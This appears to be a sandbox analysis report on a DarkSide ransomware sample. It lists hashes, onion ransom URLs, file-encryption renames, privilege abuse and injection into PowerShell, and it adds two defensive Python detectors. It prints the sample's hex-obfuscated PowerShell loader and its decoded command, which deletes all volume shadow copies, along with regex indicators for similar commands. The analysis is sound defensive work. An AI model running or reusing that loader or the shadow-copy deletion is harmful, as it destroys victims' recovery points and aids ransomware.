Analysis
- max time kernel: 14s
- max time network: 12s
- platform: windows7_x64
- resource: win7v20210408
- submitted: 29-05-2021 10:12

Static task: static1
Behavioral task: behavioral1
  Sample: ut.bin.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: ut.bin.exe
  Resource: win10v20210410
General
- Target: ut.bin.exe
- Size: 226KB
- MD5: c81dae5c67fb72a2c2f24b178aea50b7
- SHA1: 4bd6437cd1dc77097a7951466531674f80c866c6
- SHA256: 48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a
- SHA512: 30d63e080f37f34fb29fd46f8fb1572d79f645154a002c8da5914ae3d51e224bc60601f91f5d58ac2ce9f81d56a8ad467d7fde55d429ed269df3c196e6687b2c
Malware Config
Extracted from: C:\README.137cb6d5.TXT
Family: darkside
URLs:
- http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
- http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files (13 IoCs)
Ransomware generally changes the extension on encrypted files. Here every renamed file receives the appended extension .137cb6d5, the same tag that appears in the ransom note name README.137cb6d5.TXT in the Malware Config section.
Processes: ut.bin.exe (description / ioc / process)
  File opened for modification  C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5  ut.bin.exe
  File renamed  C:\Users\Admin\Pictures\LimitRepair.tif => C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5  ut.bin.exe
  File renamed  C:\Users\Admin\Pictures\ResetUnpublish.crw => C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5  ut.bin.exe
  File renamed  C:\Users\Admin\Pictures\SelectMount.png => C:\Users\Admin\Pictures\SelectMount.png.137cb6d5  ut.bin.exe
  File renamed  C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5  ut.bin.exe
  File opened for modification  C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5  ut.bin.exe
  File opened for modification  C:\Users\Admin\Pictures\SubmitDismount.tiff  ut.bin.exe
  File renamed  C:\Users\Admin\Pictures\SubmitDismount.tiff => C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5  ut.bin.exe
  File renamed  C:\Users\Admin\Pictures\EditCompress.raw => C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5  ut.bin.exe
  File opened for modification  C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5  ut.bin.exe
  File opened for modification  C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5  ut.bin.exe
  File opened for modification  C:\Users\Admin\Pictures\SelectMount.png.137cb6d5  ut.bin.exe
  File opened for modification  C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5  ut.bin.exe
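The rename events listed above are the raw material for a simple behavioral detector. The following is an added example, not part of the sandbox report or of any vendor's tooling: it parses the event lines exactly as the report prints them (copied here as constructed input), groups renames by renaming process and appended extension, and raises confidence when the suffix is an 8-hex tag that also appears in the ransom note filename (README.137cb6d5.TXT above). The five-file threshold and the hex-tag heuristic are the example's own assumptions, not something the report states.

```python
"""Flag ransomware-style mass renames from sandbox file events.

Added example for this report, not part of the sandbox's own tooling. The
event lines below are copied from the "Modifies extensions of user files"
signature; the ransom-note path comes from the Malware Config section.
The threshold and the hex-tag heuristic are the example's own choices.
"""
import re
from collections import defaultdict

# Event lines as printed by the sandbox (copied from the report).
EVENTS = r"""
File opened for modification C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 ut.bin.exe
File renamed C:\Users\Admin\Pictures\LimitRepair.tif => C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5 ut.bin.exe
File renamed C:\Users\Admin\Pictures\ResetUnpublish.crw => C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5 ut.bin.exe
File renamed C:\Users\Admin\Pictures\SelectMount.png => C:\Users\Admin\Pictures\SelectMount.png.137cb6d5 ut.bin.exe
File renamed C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5 ut.bin.exe
File opened for modification C:\Users\Admin\Pictures\SubmitDismount.tiff ut.bin.exe
File renamed C:\Users\Admin\Pictures\SubmitDismount.tiff => C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5 ut.bin.exe
File renamed C:\Users\Admin\Pictures\EditCompress.raw => C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 ut.bin.exe
"""
RANSOM_NOTE = r"C:\README.137cb6d5.TXT"

RENAME_RE = re.compile(r"^File renamed (?P<old>.+?) => (?P<new>.+?) (?P<proc>\S+)$")
# Heuristic (example's own): an 8-character lowercase hex tag used as the new extension.
HEX_TAG_RE = re.compile(r"^[0-9a-f]{8}$")


def appended_suffix(old: str, new: str):
    """Return the extension appended to `old` to produce `new`, else None."""
    if new.startswith(old + ".") and len(new) > len(old) + 1:
        return new[len(old) + 1:]
    return None


def mass_rename_suffixes(events: str, min_files: int = 5) -> dict:
    """Group rename events by (process, appended suffix).

    Returns {(process, suffix): sorted original paths} for every group that
    touched at least `min_files` distinct files. Non-rename lines are ignored.
    """
    groups = defaultdict(set)
    for line in events.splitlines():
        m = RENAME_RE.match(line.strip())
        if not m:
            continue
        suffix = appended_suffix(m["old"], m["new"])
        if suffix:
            groups[(m["proc"], suffix)].add(m["old"])
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_files}


def note_tag(note_path: str):
    """Extract the tag from a README.<tag>.TXT ransom-note name, if present."""
    m = re.search(r"README\.([0-9a-fA-F]+)\.TXT$", note_path)
    return m.group(1).lower() if m else None


def assess(events: str, note_path: str, min_files: int = 5) -> list:
    """Return one finding per suspicious rename group.

    A group is reported when it meets the file threshold; it is marked 'high'
    confidence when the suffix is an 8-hex tag that also appears in the
    ransom-note filename, as it does for this sample.
    """
    tag = note_tag(note_path)
    findings = []
    for (proc, suffix), files in mass_rename_suffixes(events, min_files).items():
        hex_tag = bool(HEX_TAG_RE.match(suffix))
        matches_note = tag is not None and tag == suffix.lower()
        findings.append({
            "process": proc,
            "suffix": suffix,
            "files": len(files),
            "matches_ransom_note": matches_note,
            "confidence": "high" if hex_tag and matches_note else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in assess(EVENTS, RANSOM_NOTE):
        print(finding)
```

On the report's own events this yields a single high-confidence finding for ut.bin.exe with six distinct files renamed to .137cb6d5; the "File opened for modification" lines are skipped because they carry no old/new pair.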
-
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials.
-
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Calling NtSetInformationThread with the ThreadHideFromDebugger information class stops the thread from reporting debug events to an attached debugger; it is a common anti-analysis technique.
Processes: ut.bin.exe (pid / process)
  1776  ut.bin.exe
-
Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes: ut.bin.exe, powershell.exe (pid / process)
  1776  ut.bin.exe
  1776  ut.bin.exe
  1776  ut.bin.exe
  2040  powershell.exe
  2040  powershell.exe
  1776  ut.bin.exe
-
Suspicious use of AdjustPrivilegeToken (24 IoCs)
Processes: ut.bin.exe, powershell.exe, vssvc.exe (description / pid / process)
  Token: SeIncreaseQuotaPrivilege       1776  ut.bin.exe
  Token: SeSecurityPrivilege            1776  ut.bin.exe
  Token: SeTakeOwnershipPrivilege       1776  ut.bin.exe
  Token: SeLoadDriverPrivilege          1776  ut.bin.exe
  Token: SeSystemProfilePrivilege       1776  ut.bin.exe
  Token: SeSystemtimePrivilege          1776  ut.bin.exe
  Token: SeProfSingleProcessPrivilege   1776  ut.bin.exe
  Token: SeIncBasePriorityPrivilege     1776  ut.bin.exe
  Token: SeCreatePagefilePrivilege      1776  ut.bin.exe
  Token: SeBackupPrivilege              1776  ut.bin.exe
  Token: SeRestorePrivilege             1776  ut.bin.exe
  Token: SeShutdownPrivilege            1776  ut.bin.exe
  Token: SeDebugPrivilege               1776  ut.bin.exe
  Token: SeSystemEnvironmentPrivilege   1776  ut.bin.exe
  Token: SeRemoteShutdownPrivilege      1776  ut.bin.exe
  Token: SeUndockPrivilege              1776  ut.bin.exe
  Token: SeManageVolumePrivilege        1776  ut.bin.exe
  Token: 33                             1776  ut.bin.exe
  Token: 34                             1776  ut.bin.exe
  Token: 35                             1776  ut.bin.exe
  Token: SeDebugPrivilege               2040  powershell.exe
  Token: SeBackupPrivilege              1828  vssvc.exe
  Token: SeRestorePrivilege             1828  vssvc.exe
  Token: SeAuditPrivilege               1828  vssvc.exe
The numeric values 33, 34 and 35 are the winnt.h privilege constants SE_INC_WORKING_SET_PRIVILEGE, SE_TIME_ZONE_PRIVILEGE and SE_CREATE_SYMBOLIC_LINK_PRIVILEGE. ut.bin.exe enables a long run of privileges one after another, the pattern of a loop over every privilege in its token; SeBackupPrivilege, SeRestorePrivilege and SeTakeOwnershipPrivilege in particular let it read and overwrite files regardless of their ACLs.
-
Suspicious use of WriteProcessMemory (4 IoCs)
Processes: ut.bin.exe (description / pid / process / target process)
  PID 1776 wrote to memory of 2040  1776  ut.bin.exe  powershell.exe
  PID 1776 wrote to memory of 2040  1776  ut.bin.exe  powershell.exe
  PID 1776 wrote to memory of 2040  1776  ut.bin.exe  powershell.exe
  PID 1776 wrote to memory of 2040  1776  ut.bin.exe  powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ut.bin.exe  (pid 1776, depth 1)
  "C:\Users\Admin\AppData\Local\Temp\ut.bin.exe"
  - Modifies extensions of user files
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  -
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (pid 2040, depth 2, child of ut.bin.exe)
    powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
    The loop rebuilds a script from the hex blob two digits at a time and runs it with iex. It decodes to:
      Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
    i.e. deletion of every volume shadow copy via WMI, removing VSS-based restore points.
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exe  (pid 1828, depth 1)
  C:\Windows\system32\vssvc.exe
  Volume Shadow Copy service. It is started on demand to service the shadow-copy enumeration and deletion requested by powershell.exe, which is why it appears as a separate root process rather than a child.
  - Suspicious use of AdjustPrivilegeToken
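The powershell.exe command line above is the kind of loader an analyst decodes by hand once and then wants to handle automatically. The following is an added example, not code from the report, the sandbox or the sample: it decodes that loader the way PowerShell would, honouring the (0..61) bound so that trailing bytes of the blob are dropped, and then checks both the raw and the decoded text for shadow-copy deletion. The command line is copied verbatim from the process tree; the regexes, the indicator names and the two extra vssadmin/wmic indicators (not on this page, included because they are the usual alternatives to the WMI form) are the example's own.

```python
"""Decode the hex-obfuscated PowerShell loader from the process tree and flag
what it executes.

Added example for this report, not code from the sandbox or the sample. The
command line is copied verbatim from the powershell.exe (pid 2040) entry. The
regexes and the indicator list are the example's own; the vssadmin and wmic
indicators are not on this page and cover variants seen in other ransomware.
"""
import re
from typing import Optional

# Command line of pid 2040, copied from the report's process tree.
CMDLINE = (
    'powershell -ep bypass -c "(0..61)|%{$s+=[char][byte](\'0x\'+'
    "'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'"
    '.Substring(2*$_,2))};iex $s"'
)

# Matches: (0..N)|%{$s+=[char][byte]('0x'+'<hex>'.Substring(2*$_,2))};iex $s
HEX_LOADER_RE = re.compile(
    r"\(0\.\.(?P<last>\d+)\)\|%\{\$s\+=\[char\]\[byte\]\('0x'\+'(?P<hex>[0-9A-Fa-f]+)'"
    r"\.Substring\(2\*\$_,2\)\)\};iex \$s"
)

# Shadow-copy deletion indicators (example's own list). The first is the form
# this sample uses; the other two are common alternatives not seen on this page.
SHADOW_COPY_INDICATORS = (
    ("wmi_shadowcopy_delete", re.compile(r"Win32_Shadowcopy.*\.Delete\(\)", re.I | re.S)),
    ("vssadmin_delete_shadows", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("wmic_shadowcopy_delete", re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
)


def decode_hex_loader(cmdline: str) -> Optional[str]:
    """Return the script that `iex $s` would run, or None if the loader is absent.

    The loop consumes indexes 0..last only, so any trailing bytes of the hex
    blob are dropped exactly as PowerShell drops them (here a trailing 0x20).
    """
    m = HEX_LOADER_RE.search(cmdline)
    if m is None:
        return None
    wanted = 2 * (int(m.group("last")) + 1)
    hexstr = m.group("hex")[:wanted]
    if len(hexstr) < wanted:
        # Substring() would throw inside PowerShell; treat as a broken loader.
        return None
    return bytes.fromhex(hexstr).decode("latin-1")


def classify(cmdline: str) -> dict:
    """Summarise one PowerShell command line for triage.

    Indicators are matched against the raw command line and, when a hex loader
    is present, against its decoded payload as well.
    """
    decoded = decode_hex_loader(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in SHADOW_COPY_INDICATORS if rx.search(haystack)]
    return {
        "decoded": decoded,
        "execution_policy_bypass": bool(
            re.search(r"-e(xecutionpolicy|p)\s+bypass", cmdline, re.I)
        ),
        "hex_loader": decoded is not None,
        "shadow_copy_deletion": hits,
        "inhibits_recovery": bool(hits),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(classify(CMDLINE), indent=2))
```

Matching on the decoded text rather than only on the raw command line is the point: a rule keyed on the literal string Win32_Shadowcopy never fires on the hex form, while a rule keyed on the loader shape (the (0..N) loop feeding iex) fires regardless of what the blob contains.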
Network
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5     3e75df13a0f95661a9af769da5ce1f00
  SHA1    81200a6da33299de3e68cf86bcf4c31c5bf0165a
  SHA256  cff3c1c628268eb8af674a5dadff5cb565e1ab2c13f69458401f7e5b08f95308
  SHA512  05be5cbe3e93b2574ea8854144601d3fcc320b4cc6fc6dd4feeb6827b2d61c729ba0cdacbaa3333daa492eaf88bf3b458cfe5f0e4470e60d3d0958fa632ef13c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5     48a82b6753094950d9d3eacb72054bea
  SHA1    375ce7b97c9e51c022124c50b724fc3fd7c418ea
  SHA256  0cf4c9486a6b66bbede503837ab66024587ab3d556508918706320b59b2d32df
  SHA512  8d755fb2ca1a4461ba3dc4186dba4bd230a3035b1319e96ab5d0647337bbe27b1414fa04a6342a031334cfa0206062a80e632fc5e3c118f1b3bc10e5951a558f
-
Memory dumps (file / size):
memory/1776-66-0x0000000000290000-0x00000000002CC000-memory.dmp  240KB
memory/1776-60-0x0000000075C31000-0x0000000075C33000-memory.dmp  8KB
memory/1776-59-0x00000000001F0000-0x00000000001F1000-memory.dmp  4KB
memory/1776-67-0x0000000000200000-0x0000000000201000-memory.dmp  4KB
memory/2040-63-0x0000000001E30000-0x0000000001E31000-memory.dmp  4KB
memory/2040-65-0x0000000002450000-0x0000000002451000-memory.dmp  4KB
memory/2040-64-0x000000001AAC0000-0x000000001AAC1000-memory.dmp  4KB
memory/2040-68-0x000000001A9A0000-0x000000001A9A2000-memory.dmp  8KB
memory/2040-69-0x000000001A9A4000-0x000000001A9A6000-memory.dmp  8KB
memory/2040-70-0x0000000002330000-0x0000000002331000-memory.dmp  4KB
memory/2040-71-0x000000001B620000-0x000000001B621000-memory.dmp  4KB
memory/2040-72-0x000000001C560000-0x000000001C561000-memory.dmp  4KB
memory/2040-62-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmp  8KB
memory/2040-61-0x0000000000000000-mapping.dmp
The 240KB region at 0x290000 in pid 1776 is the only dump comparable in size to the 226KB sample and is the first one worth examining for an unpacked image; the remaining dumps are single pages and the pid 2040 regions belong to the PowerShell host.